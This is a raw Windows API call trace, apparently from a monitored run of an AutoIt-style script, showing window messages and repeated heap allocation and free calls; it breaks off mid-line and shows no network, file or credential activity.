[0259.211] GetStockObject (i=17) returned 0x18a0025 [0259.211] SendMessageW (hWnd=0x40168, Msg=0x30, wParam=0x18a0025, lParam=0x0) returned 0x1 [0259.213] GetWindowTextLengthW (hWnd=0x40168) returned 0 [0259.213] SendMessageW (hWnd=0x40168, Msg=0xb1, wParam=0x0, lParam=0x0) returned 0x1 [0259.213] GetClientRect (in: hWnd=0x40168, lpRect=0x7df920 | out: lpRect=0x7df920) returned 1 [0259.213] GetWindowRect (in: hWnd=0x40168, lpRect=0x7df920 | out: lpRect=0x7df920) returned 1 [0259.213] SetWindowLongW (hWnd=0x40168, nIndex=-21, dwNewLong=4) returned 0 [0259.214] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31f58 | out: hHeap=0xbc0000) returned 1 [0259.214] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7ef0 | out: hHeap=0xbc0000) returned 1 [0259.214] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7cc8 | out: hHeap=0xbc0000) returned 1 [0259.214] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7d10 | out: hHeap=0xbc0000) returned 1 [0259.214] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7ce0 | out: hHeap=0xbc0000) returned 1 [0259.214] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7c68 | out: hHeap=0xbc0000) returned 1 [0259.214] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7c80 | out: hHeap=0xbc0000) returned 1 [0259.214] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe1fcd0 | out: hHeap=0xbc0000) returned 1 [0259.215] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31f48 | out: hHeap=0xbc0000) returned 1 [0259.215] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fcd0 [0259.215] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7c80 [0259.215] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe31f48 [0259.215] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7c68 [0259.215] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0259.215] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe31f58 [0259.215] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xde54f8 [0259.215] CharUpperBuffW (in: lpsz="_GUICTRLEDIT_SETLIMITTEXT", cchLength=0x19 | out: lpsz="_GUICTRLEDIT_SETLIMITTEXT") returned 0x19 [0259.215] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xde54f8 | out: hHeap=0xbc0000) returned 1 [0259.215] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31f58 | out: hHeap=0xbc0000) returned 1 [0259.215] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fcf8 [0259.215] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xe31f58 [0259.215] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fd20 [0259.215] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7ce0 [0259.215] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31fb8 [0259.215] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31fb8 | out: hHeap=0xbc0000) returned 1 [0259.215] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xe31fb8 [0259.216] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7d10 [0259.216] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31fc8 [0259.216] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31fc8 | out: hHeap=0xbc0000) returned 1 [0259.216] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xdd7cc8 [0259.216] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fd48 [0259.216] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7ef0 [0259.216] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe31fc8 [0259.216] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7f50 [0259.216] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fd70 [0259.216] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7f68 [0259.216] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe31fd8 [0259.216] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7f80 [0259.216] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xde54f8 [0259.216] PeekMessageW (in: lpMsg=0x7dfb5c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb5c) returned 0 [0259.216] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31fe8 [0259.216] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31ff8 [0259.216] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fd98 [0259.216] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7f98 [0259.216] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7f98 | out: hHeap=0xbc0000) returned 1 [0259.216] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe1fd98 | out: hHeap=0xbc0000) returned 1 [0259.216] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31ff8 | out: hHeap=0xbc0000) returned 1 [0259.216] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31fe8 | out: hHeap=0xbc0000) returned 1 [0259.217] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fd98 [0259.217] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xdd7f98 [0259.217] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7fb0 [0259.217] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xdd7fc8 [0259.217] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xdd7fe0 [0259.217] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xdd7ff8 [0259.217] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xdd8010 [0259.217] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8028 [0259.217] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xdd8040 [0259.217] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xdd8058 [0259.217] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31fe8 [0259.217] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fdc0 [0259.217] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8070 [0259.217] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31ff8 [0259.217] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31ff8 | out: hHeap=0xbc0000) returned 1 [0259.217] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd8070 | out: hHeap=0xbc0000) returned 1 [0259.217] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe1fdc0 | out: hHeap=0xbc0000) returned 1 [0259.217] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31fe8 | out: hHeap=0xbc0000) returned 1 [0259.217] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7fb0 | out: hHeap=0xbc0000) returned 1 [0259.217] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7f98 | out: hHeap=0xbc0000) returned 1 [0259.218] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7fc8 | out: hHeap=0xbc0000) returned 1 [0259.218] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7fe0 | out: hHeap=0xbc0000) returned 1 [0259.218] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd7ff8 | out: hHeap=0xbc0000) returned 1 [0259.218] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd8028 | out: hHeap=0xbc0000) returned 1 [0259.218] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd8010 | out: hHeap=0xbc0000) returned 1 [0259.218] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd8040 | out: hHeap=0xbc0000) returned 1 [0259.218] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd8058 | out: hHeap=0xbc0000) returned 1 [0259.218] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe1fd98 | out: hHeap=0xbc0000) returned 1 [0259.218] PeekMessageW (in: lpMsg=0x7dfb5c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb5c) returned 0 [0259.218] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe31fe8 [0259.218] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fd98 [0259.218] CharUpperBuffW (in: lpsz="_SENDMESSAGE", cchLength=0xc | out: lpsz="_SENDMESSAGE") returned 0xc [0259.218] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe1fd98 | out: hHeap=0xbc0000) returned 1 [0259.218] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31fe8 | out: hHeap=0xbc0000) returned 1 [0259.218] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fd98 [0259.218] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xe31fe8 [0259.218] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fdc0 [0259.218] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8058 [0259.218] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe31ff8 [0259.218] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe31ff8 | out: hHeap=0xbc0000) returned 1 [0259.218] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xe31ff8 [0259.219] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8040 [0259.219] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32008 [0259.219] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32008 | out: hHeap=0xbc0000) returned 1 [0259.219] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xe32008 [0259.219] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8010 [0259.219] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32018 [0259.219] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32018 | out: hHeap=0xbc0000) returned 1 [0259.219] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xdd8028 [0259.219] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fde8 [0259.219] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7ff8 [0259.219] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32018 [0259.219] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7fe0 [0259.219] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fe10 [0259.219] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7fc8 [0259.219] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32028 [0259.219] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7f98 [0259.219] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fe38 [0259.219] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd7fb0 [0259.220] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32038 [0259.220] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8070 [0259.220] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32048 [0259.220] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32048 | out: hHeap=0xbc0000) returned 1 [0259.220] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fe60 [0259.220] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8088 [0259.220] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32048 [0259.220] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd80a0 [0259.220] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32058 [0259.220] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32058 | out: hHeap=0xbc0000) returned 1 [0259.220] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fe88 [0259.220] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd80b8 [0259.220] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32058 [0259.220] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd80d0 [0259.220] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32068 [0259.220] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd80e8 [0259.220] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32068 | out: hHeap=0xbc0000) returned 1 [0259.220] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1feb0 [0259.221] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8100 [0259.221] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32068 [0259.221] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd8100 | out: hHeap=0xbc0000) returned 1 [0259.221] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1fed8 [0259.221] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8100 [0259.221] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8118 [0259.221] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32078 [0259.221] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd80e8 | out: hHeap=0xbc0000) returned 1 [0259.221] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd80e8 [0259.221] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32078 | out: hHeap=0xbc0000) returned 1 [0259.221] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1ff00 [0259.221] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8130 [0259.221] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32078 [0259.221] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd8130 | out: hHeap=0xbc0000) returned 1 [0259.221] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1ff28 [0259.221] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8130 [0259.221] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8148 [0259.221] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe32088 [0259.221] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd80e8 | out: hHeap=0xbc0000) returned 1 [0259.222] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd80e8 [0259.222] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe32088 | out: hHeap=0xbc0000) returned 1 [0259.222] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1ff50 [0259.222] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8160 [0259.222] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32088 [0259.222] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd8160 | out: hHeap=0xbc0000) returned 1 [0259.222] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1ff78 [0259.222] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8160 [0259.222] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8178 [0259.222] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xde5540 [0259.222] PeekMessageW (in: lpMsg=0x7df904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df904) returned 0 [0259.222] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1ffa0 [0259.222] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8190 [0259.222] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32098 [0259.222] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd81a8 [0259.222] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd81c0 [0259.222] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe320a8 [0259.222] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd81c0 | out: hHeap=0xbc0000) returned 1 [0259.223] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1ffc8 [0259.223] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd81c0 [0259.223] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe320b8 [0259.223] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd81d8 [0259.223] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe320b8 | out: hHeap=0xbc0000) returned 1 [0259.223] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd81f0 [0259.223] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe320b8 [0259.223] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8208 [0259.223] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe320b8 | out: hHeap=0xbc0000) returned 1 [0259.223] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8220 [0259.223] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe320b8 [0259.223] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8238 [0259.223] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe320b8 | out: hHeap=0xbc0000) returned 1 [0259.223] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8250 [0259.223] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe320b8 [0259.223] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8268 [0259.223] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe320b8 | out: hHeap=0xbc0000) returned 1 [0259.223] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8280 [0259.223] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe320b8 [0259.224] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe320b8 | out: hHeap=0xbc0000) returned 1 [0259.224] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8298 [0259.224] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe320b8 [0259.224] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd82b0 [0259.224] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe320b8 | out: hHeap=0xbc0000) returned 1 [0259.224] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd82c8 [0259.224] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe320b8 [0259.224] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe320b8 | out: hHeap=0xbc0000) returned 1 [0259.224] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd82e0 [0259.224] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe320b8 [0259.224] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd82f8 [0259.224] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe320b8 | out: hHeap=0xbc0000) returned 1 [0259.224] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xde5588 [0259.224] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe1ffc8 | out: hHeap=0xbc0000) returned 1 [0259.224] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8310 [0259.224] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe320b8 [0259.224] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe320b8 | out: hHeap=0xbc0000) returned 1 [0259.224] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8328 [0259.225] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe320b8 [0259.225] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8340 [0259.225] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe320b8 | out: hHeap=0xbc0000) returned 1 [0259.225] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8358 [0259.225] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xe320b8 [0259.225] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe320b8 | out: hHeap=0xbc0000) returned 1 [0259.225] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe320b8 [0259.225] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8370 [0259.225] CharLowerBuffW (in: lpsz="lresult", cchLength=0x7 | out: lpsz="lresult") returned 0x7 [0259.225] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8388 [0259.225] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe320c8 [0259.225] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe320d8 [0259.225] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd83a0 [0259.225] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd8388 | out: hHeap=0xbc0000) returned 1 [0259.225] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe320c8 | out: hHeap=0xbc0000) returned 1 [0259.225] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd83a0 | out: hHeap=0xbc0000) returned 1 [0259.225] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe320d8 | out: hHeap=0xbc0000) returned 1 [0259.225] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xe1ffc8 [0259.226] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe320d8 [0259.226] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd83a0 [0259.226] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe320c8 [0259.226] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe320e8 [0259.226] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8388 [0259.226] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd83a0 | out: hHeap=0xbc0000) returned 1 [0259.226] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe320c8 | out: hHeap=0xbc0000) returned 1 [0259.226] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd8388 | out: hHeap=0xbc0000) returned 1 [0259.226] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe320e8 | out: hHeap=0xbc0000) returned 1 [0259.226] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe320e8 [0259.226] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8388 [0259.226] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe320c8 [0259.226] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe320f8 [0259.226] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd83a0 [0259.226] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd8388 | out: hHeap=0xbc0000) returned 1 [0259.226] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe320c8 | out: hHeap=0xbc0000) returned 1 [0259.226] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdd83a0 | out: hHeap=0xbc0000) returned 1 [0259.226] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe320f8 | out: hHeap=0xbc0000) returned 1 [0259.227] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe320f8 [0259.227] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd83a0 [0259.227] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe320c8 [0259.227] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xe32108 [0259.227] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xdd8388 [0259.227] HeapFree (in: hHeap=0xbc0000, 